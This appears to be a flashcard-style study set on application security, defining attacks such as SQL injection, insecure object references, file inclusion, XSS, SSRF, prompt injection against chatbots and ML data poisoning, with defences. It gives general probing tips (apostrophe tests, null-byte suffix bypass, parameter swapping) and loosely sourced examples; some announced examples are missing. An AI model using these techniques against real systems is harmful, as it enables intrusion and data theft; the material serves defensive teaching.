Service interruption can signify malicious activity, as it may indicate that an attacker has successfully compromised a system or network and is attempting to disrupt normal operations or deny access to critical resources. Some reasons why service interruption is a sign of malicious activity include the following:
Definition
§Denial of Service (DoS) Attacks—Attackers may carry out DoS attacks to overwhelm a system or network with traffic or requests, rendering it unable to function correctly.
§Ransomware Infection—Ransomware typically causes significant disruption to business operations.
§Exploiting Vulnerabilities—When attackers exploit systems, it often causes services and applications to crash.
§Insider Threats—Insider threats, such as employees or contractors with authorized access to systems, may intentionally or unintentionally cause service interruptions by misconfiguring systems, mishandling data, making mistakes, or introducing malware.
Term
Application Logs
Application logs can be a valuable source of information for identifying suspicious activity, as they record detailed information about the behavior of applications and users on a system or network.
Definition
§Monitoring for Unusual or Unauthorized Access—Application logs document unauthorized access attempts and unusual activity patterns. For example, a log may show repeated login attempts from an unfamiliar IP address or user account, indicating a potential credential stuffing or brute-force attack.
§Tracking Changes to Application Settings or Configurations—Application logs track changes to settings, which may indicate an attacker attempting to gain persistence or establish a backdoor.
§Detecting Anomalies in Application Behavior—Application logs detect anomalies in application behavior, such as unexpected data inputs or unusual data flows, which may indicate attempts to exploit vulnerabilities or bypass security measures.
§Identifying the Source of Security Incidents—Application logs can identify the source of security incidents, such as a malware infection or a phishing attack, by tracking the source of the initial access or communication.
Auditing User Behavior—Application logs store user activity data, such as changes to permissions, access attempts, authentication activity, and many actions to identify potential malicious activity.
Term
Secure Software Development Life Cycle (SSDLC)
Definition
A method of system development that incorporates security controls in every phase of the system's lifecycle.
The Secure Software Development Life Cycle (SSDLC) is a process for developing software that emphasizes security throughout the development lifecycle. It helps identify and mitigate security risks at every stage of the software development lifecycle, from initial design to testing and deployment. This contrasts with traditional software development lifecycles (SDLC) that focus on collecting and implementing functional (user) requirements. Traditional software development lifecycles produce software that works well but is not necessarily secure.
Term
OWASP Testing Guide
Definition
The OWASP Testing Guide is a comprehensive guide for testing the security of web applications. It is a project of the Open Web Application Security Project (OWASP) designed to help developers, testers, and security professionals identify and address security vulnerabilities in web applications.
The OWASP Testing Guide provides a structured approach to web application security testing and provides specific guidance for each of the following areas:
Information Gathering
Configuration and Deployment Management Testing
Identity Management Testing
Input Validation Testing
Testing for Error Handling and Logging
Testing for Cryptography
Business Logic Testing
Client-side Testing
Testing for Web Services
Testing for Mobile Security
Term
On-Path Attack
Definition
An on-path (formally known as a man-in-the-middle) attack describes when an attacker intercepts communications between two endpoints to capture their traffic. On-path attacks are accomplished via several methods, but common techniques include ARP spoofing and DNS spoofing (to direct traffic to a malicious website). A practical way to defend against these attacks is to use encrypted communications, such as HTTPS or VPN.
Term
Password spraying
Definition
A brute force attack in which multiple user accounts are tested with a dictionary of common passwords.
Describes when an attacker chooses predetermined passwords and tries them for multiple user accounts. An attacker may be able to collect a list of usernames from a poorly protected directory, and the goal then becomes identifying accounts in the list with breakable or easy-to-guess passwords.
Term
Credential stuffing
Definition
A brute force attack in which stolen user account names and passwords are tested against multiple websites.
Describes the use of credentials stolen from one source and trying them against multiple other sources. This attack is successful because users often use the same credentials in multiple locations.
Term
Broken authentication
Definition
A software vulnerability where the authentication mechanism allows an attacker to gain entry, such as displaying cleartext credentials, using weak session tokens, or permitting brute force login requests.
Broken authentication refers to an app that fails to restrict access to protected resources. This can be caused by many different vulnerabilities, including the following:
No requirement for strong passwords
Vulnerable password reset mechanisms that allow an attacker to reset user passwords
Unintended exposure of credentials or authorization tokens, often caused by hard-coding credentials within the app, cleartext transmission, weak cryptographic methods, or storing poorly protected credential storage
An app that is vulnerable to session hijacking
Term
input validation
Definition
Any technique used to ensure that the data entered into a field or variable in an application is handled appropriately by that application.
Term
output encoding
Definition
Coding methods to sanitize output created from user input. Output encoding mitigates against injection and XSS attacks that seek to use input to run a script.
Term
parameterized queries
Definition
A technique that defends against SQL injection by incorporating placeholders in a SQL query.
Websites with a database backend should incorporate a technique called parameterized queries to defend against code injection attacks and insecure object references. A parameterized query is a type of output encoding. A query is parameterized when it incorporates placeholders for some of its parameters. Later, when the query is executed, the web app binds the actual values to these parameters in a different statement. So, a quotation mark in a parameterized query would be interpreted as a literal character and not as part of a command operator.
Term
Data Protection
Definition
Secure coding practices ensure that sensitive data is kept confidential and secure. The best practices for secure coding are outlined in several sections within this lesson and include input validation, using encryption, implementing strong authorization and authentication, proper error handling, secure storage of sensitive data, and regular testing and maintenance.
Term
Session Management Session management is critical to secure coding, as it involves managing user sessions to ensure that users are properly authenticated and authorized.
Definition
Coding Best Practice
Description
Use secure session IDs
Session IDs should be randomly generated, long, and difficult to guess to prevent guessing or brute-forcing session IDs to gain unauthorized access.
Use secure cookies
Cookies should be marked as secure and set to HTTPS-only to prevent them from being intercepted or modified. Developers should ensure that cookies do not contain sensitive information and expire after a reasonable time.
Implement session timeouts
Sessions should end automatically after a predetermined period of inactivity to prevent abuse.
Use strong password policies
Strong password policies prevent attackers from easily guessing or cracking user passwords.
Use multi-factor authentication
Multi-factor authentication provides an additional layer of security by requiring users to provide more than one form of authentication. This significantly reduces the risk of password attacks.
Implement access controls
Restrict access to sensitive resources and prevent unauthorized access. Developers should ensure that access controls protect sensitive resources and data and that users cannot bypass them.
Protect against session hijacking and fixation
Session hijacking and fixation attacks involve stealing or manipulating a user's session ID. Developers must utilize secure session IDs and implement secure cookie-handling practices.
Term
Buffer overflow
Definition
An attack in which data goes past the boundary of the destination buffer and begins to corrupt adjacent memory. This can allow the attacker to crash the system or execute arbitrary code.
Buffer overflow —A buffer overflow is a software vulnerability where a program attempts to write more data to a buffer (a temporary storage area in memory) than it can hold, causing the excess data to overflow into adjacent memory space. This can cause the program to crash or behave unpredictably. In some cases, it can be exploited by an attacker to execute arbitrary code or take control of the affected system.
Heartbleed is a security vulnerability discovered in the widely used OpenSSL cryptographic software library. The bug allows an attacker to read sensitive information from the memory of a vulnerable web server, such as private keys, usernames, passwords, and other confidential data.
Term
heap overflow
Definition
A software vulnerability where input is allowed to overwrite memory locations within the area of a process's memory allocation used to store dynamically sized variables.
The heap is an area of memory allocated by the application during execution to store a variable. The heap can be used to store larger amounts of data than the stack, and variables are globally accessible to the process. A heap overflow can overwrite those variables and possibly allow arbitrary code execution. An example is a known vulnerability in Microsoft's GDI+ processing of JPEG images (kb.cert.org/vuls/id/297462). Also, management of objects in the heap is dependent on the process that created the object. Failing to de-allocate memory can cause a memory leak.
Term
integer overflow
Definition
An attack in which a computed result is too large to fit in its assigned storage space, which may lead to crashing or data corruption, and may trigger a buffer overflow.
An integer overflow is a type of software vulnerability that occurs when a program tries to store an integer value larger than the maximum value that the data type can hold, causing the value to wrap around to a lower value or overflow into adjacent memory space. This can cause the program to behave unpredictably, resulting in a security vulnerability if the overflowed value is used in a sensitive calculation or security check.
Term
stack overflow
Definition
A stack overflow vulnerability occurs when a program tries to store more data in the stack than it can handle. The stack is a region of memory that holds temporary data created by a program during runtime. When a function is called, it creates a stack frame that contains information such as local variables, return addresses, and other data. If a program tries to store more data than the stack frame can hold, it can cause a buffer overflow, overwriting adjacent memory and potentially causing the program to crash or execute malicious code. Attackers can exploit stack overflow vulnerabilities to gain control of a system or steal sensitive data. To prevent stack overflow vulnerabilities, developers must ensure that programs allocate enough memory for the stack, use safe programming practices, and use operating systems that utilize address space layout randomization (ASLR).
Term
address space layout randomization (ASLR)
Definition
A technique that randomizes where components in a running application are placed in memory to protect against buffer overflows.
Running software with least privilege can also help prevent this type of attack, as can using an operating system with address space layout randomization (ASLR). ASLR randomizes where components of a running process—the base executable, APIs, the heap, and so on—are placed in memory, which makes it more difficult to aim a buffer overflow at specific points in the address space.
Term
SQL injection
Definition
An attack that injects a database query into the input data directed at a server by accessing the client side of the application.
In a SQL injection attack, an attacker can modify one or more of these four basic functions by adding code to some input within the web app, causing it to execute the attacker's own set of queries using SQL. To identify SQL injection vulnerabilities in a web app, an attacker must test every single input to include elements such as URL parameters, form fields, cookies, POST data, and HTTP headers. One of the most common methods for identifying possible SQL injection vulnerabilities in a web app is to submit a single apostrophe and then look for errors. If an error is returned, the attacker will look to see if it provides them with SQL syntax details that can then be used to construct a more effective SQL injection query. If the single apostrophe returned an error message, the attacker may also try submitting two apostrophes, and if no error is returned, then the input being tested is most likely vulnerable to SQL injection. Attackers may also carry out injections by using the SQL wildcard character (%) to look for a large amount of data sets, or they may submit a mathematical expression equivalent to the expected value to expose some vulnerability within the app.
Term
Prompt Injection
Definition
Prompt injection vulnerabilities can pose significant risks to language models and chatbots, which rely heavily on user input. These risks include manipulating the language model's behavior, data theft or leakage, and bias and misinformation. An attacker can inject malicious code or commands into the chatbot's input field, causing it to respond with inappropriate or harmful messages or take actions that compromise privacy or security. Additionally, prompt injection attacks can insert biased or false information into the language model's training data, leading to biased or inaccurate models that produce misleading or harmful results.
One notable example is the Tay chatbot created by Microsoft, which was launched on Twitter in 2016 and quickly became the target of prompt injection attacks. Tay was designed to learn from user interactions and develop sophisticated conversational qualities. Unfortunately, within a few hours of its launch, Tay began responding to user input with racist, sexist, and otherwise offensive messages, prompting Microsoft to shut it down. Attackers deliberately supplied the Tay chatbot with inflammatory and offensive input to manipulate its behavior and responses. The attacks were possible because Tay was vulnerable to prompt injection.
Term
Insecure Object Reference
Definition
A direct object reference is a reference to the actual name of a system object that the application uses. If an attacker is able to manipulate a parameter that directly references an object, the attacker can craft that parameter to grant access to other objects the attacker would normally be unauthorized to access. For example, a call to an SQL database may request account information by directly referencing the acctname parameter. An attacker may replace the acctname parameter with a different account name or number, which would grant them access to that account if the object reference is insecure.
/webpage.php/order?acctname=bob
An attacker can arbitrarily change bob to alice. If the object reference is insecure, the query will still work:
/webpage.php/order?acctname=alice
Direct object references are typically insecure when they do not verify whether a user is authorized to access a specific object. Therefore, it is important to implement access control techniques in applications that work with private information or other types of sensitive data.
Term
Extensible Markup Language (XML) Attacks
Definition
Extensible Markup Language (XML) is used by web applications for authentication and authorizations, and for other types of data exchange and uploading. Data submitted via XML with no encryption or input validation is vulnerable to spoofing, request forgery, and injection of arbitrary data or code. There are also other types of attack that target the way a server parses an XML file submitted for upload or XML data submitted as a URL:
XML bomb (Billion Laughs attack)—The XML encodes entities that expand to exponential sizes, consuming memory on the host and potentially crashing it.
XML External Entity (XXE)—This type of attack embeds a request for a local resource, such as the server's password file.
Term
directory traversal
Definition
An application attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory.
Also referred to as file path traversal, directory traversal is a web server vulnerability that allows an attacker to access the operating system files of the system running the web application. An attacker may read or write files to the operating system. When writing files, the attacker is generally seeking to modify the operation of the server in a way that allows them to take control of it.
Term
cross-site scripting (XSS)
Definition
A malicious script hosted on the attacker's site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site, circumventing the browser's security model of trusted zones.
Reflected XSS—This type of XSS attack is like the one described above where the attack "bounces" off the web server when the link is clicked.
Persistent XSS—This type of attack occurs when malicious code is injected into a web application's database, which is then executed by all future visitors who view the infected page. This attack type is also known as stored XSS, as the malicious code is stored in the web application's database and executed when a user accesses the affected page. Persistent XSS attacks are particularly dangerous because they can be used to steal sensitive user information, including login credentials or financial data, and can also be used to gain unauthorized access to a web application's database. Web application developers can prevent persistent XSS attacks by implementing proper input validation and sanitization techniques and using secure coding practices.
Term
file inclusion
Definition
A web application vulnerability that allows an attacker either to download a file from an arbitrary location on the host file system or to upload an executable or script file to open a backdoor.
Term
remote file inclusion (RFI)
Definition
In remote file inclusion (RFI), the attacker executes a script to inject a remote file into the web app or website. An attacker could, for instance, force a parameter in a web page to call an external malicious link which includes the compromised file. As an example, consider a page built in PHP that does not properly filter arbitrary values added to page parameters. The PHP code includes a FONT parameter which has five different options, each one a different font type. The attacker can manipulate this parameter to inject an option that isn't one of these five—and not only that, the attacker can point to an external URL that contains a malicious PHP file:
In local file inclusion (LFI), the attacker adds a file to the web app or website that already exists on the hosting server. This is often accomplished on servers that are vulnerable to directory traversal; the attacker navigates through the server's file structure and executes a file. As in the directory traversal example, an attacker could gain control over the server by opening a command prompt. A common tactic used in LFI is introducing a null character (%00 in URL encoding) at the end of the request to bypass security mechanisms that automatically add a .php suffix to the request. This enables the attacker to access non-PHP files:
A text file used to store information about a user when they visit a website. Some sites use cookies to support user sessions.
A cookieis one of those methods. A cookie is created when the server sends an HTTP response header with the cookie. Subsequent request headers sent by the client will usually include the cookie. Cookies are either nonpersistent (or session) cookies, in which case they are stored in memory and deleted when the browser instance is closed, or persistent, in which case they are stored in the browser cache until deleted by the user or pass a defined expiration date.
Term
session hijacking
Definition
A type of spoofing attack where the attacker disconnects a host then replaces it with his or her own machine, spoofing the original host's IP address.
In the context of a web application, session hijacking most often means exploiting a cookie in some way. An attacker may use a fixed session ID and send that to a target. If the target enters the session (usually under false pretenses), the attacker has access to the session. Normally a cookie can only be used by the server or domain that created it, but this can be subverted by a cross-site scripting attack. Attackers can also sniff network traffic to obtain session cookies sent over an unsecured network, like a public Wi-Fi hotspot. To counter cookie hijacking, you can encrypt cookies during transmission, delete cookies from the client's browser cache when the client terminates the session, and design your web app to deliver a new cookie with each new session between the app and the client's browser.
Term
cross-site request forgery (XSRF)
Definition
A malicious script hosted on the attacker's site that can exploit a session started on another site in the same browser.
Term
Cookie Poisoning
Definition
Cookie poisoning modifies the contents of a cookie after it has been generated and sent by the web service to the client's browser so that the newly modified cookie can be used to exploit vulnerabilities in the web app. To counter cookie poisoning, you should validate the input of your web app to account for tampered-with cookies, encrypt cookies during transmission and storage, and delete cookies from the browser cache when the client terminates the session.
Term
Broken Access Control
Definition
Broken access control is a type of security vulnerability that occurs when a system fails to restrict or limit access to authorized users appropriately. This vulnerability allows unauthorized users to gain access to sensitive or confidential information, modify or delete data, or perform other unauthorized actions.
Term
Server-side request forgery (SSRF)
Definition
An attack where an attacker takes advantage of the trust established between the server and the resources it can access, including itself.
Server-side request forgery (SSRF) describes a type of web application security vulnerability that occurs when an attacker can send unauthorized requests from a vulnerable web application to other internal or external systems to gain unauthorized access. SSRF typically involves an attacker exploiting the web application's ability to send HTTP requests to other systems, which are then abused to instruct "hidden" internal or external systems to provide the attacker with access to protected features or to steal information.
The attack works by manipulating the input of a vulnerable web application to cause it to send an HTTP request to a server of the attacker's choice. The attacker can use this ability to perform a range of malicious activities, such as stealing sensitive data, launching attacks against other systems, or taking control of vulnerable systems.
Term
Some common techniques used to exploit SSRF vulnerabilities include the following:
Definition
§An attacker uses SSRF to access internal resources on a network, such as databases or file systems, that should be inaccessible directly from the Internet.
§An attacker can use SSRF to access other web applications to steal data or launch attacks against other systems.
§An attacker can use SSRF to scan the internal network for open ports or other vulnerable services, which are used to launch further attacks.
Term
To prevent SSRF vulnerabilities, web application developers should consider the following:
Definition
§Always validate user input—Ensure that all user input is properly validated and sanitized to prevent attackers from manipulating requests.
§Allowed (formerly known as whitelist) hosts—Web applications should only be allowed to access trusted hosts and block all other requests by default.
§Firewall and network segmentation—Network segmentation can prevent unauthorized access to internal systems when combined with firewalls to block traffic from unauthorized sources.
§Secure coding practices—Developers should follow secure coding practices, such as using well-established and trusted libraries, avoiding user-controlled data in requests, and implementing safe configuration settings.
Term
Data Poisoning
Definition
Data poisoning is an attack that involves deliberately manipulating or corrupting data used in machine learning (ML) models or artificial intelligence (AI) systems. The goal of a data poisoning attack is to undermine the accuracy and reliability of the ML model and potentially cause harm or damage by making the model provide incorrect or biased results.
In a data poisoning attack, an attacker deliberately introduces malicious or corrupted data into the training data set used to create or improve an ML model. The attacker may alter the data set to include incorrect or biased data, or they may introduce subtle changes to the data to change the outcome of the ML model in specific ways. By doing so, the attacker can influence the performance of the ML model, potentially causing it to produce incorrect or biased results when used in real-world applications.
Data poisoning attacks can be challenging to detect and prevent, as they generally require very few changes to the data. The effects may only appear once the ML model is used in a real-world application.
Term
Some strategies designed to mitigate the risk of data poisoning attacks include the following:
Definition
§Data Validation—Before using data in an ML model, it is crucial to validate the quality and authenticity of the data to identify malicious or corrupted inputs that could result in a data poisoning attack.
§Data Diversity—Using a diverse range of data can help prevent data poisoning attacks by making it more difficult to manipulate the inputs to modify the results.
§Anomaly Detection—Using anomaly detection techniques can help identify unusual data patterns that may indicate a data poisoning attack.
§Robust Models—Creating ML models resilient to unexpected inputs and adversarial attacks can help mitigate the risk of data poisoning.
§Regular Model Testing and Auditing—Regularly testing and auditing ML models can help to identify issues and vulnerabilities, including evidence of data poisoning attacks.
Term
Data Poisoning Examples
Definition
Amazon Rekognition System—Researchers demonstrated a data poisoning attack on Amazon's Rekognition facial recognition system by subtly changing a small percentage of the images used to train the system. They were able to cause the system to misidentify individuals in real-world scenarios.
Google Maps—Researchers showed that by submitting many fake edits to Google Maps, they could manipulate the search results for a particular location. By making small changes to the location's data, such as changing its name or address, they could push it higher up in search results or even make it disappear altogether.
Spam Filters—Researchers showed that inserting specific words into legitimate emails could bypass the spam filters used by popular email services like Gmail and Outlook. By doing so, they could send spam emails that would appear in users' inboxes without being flagged as spam.
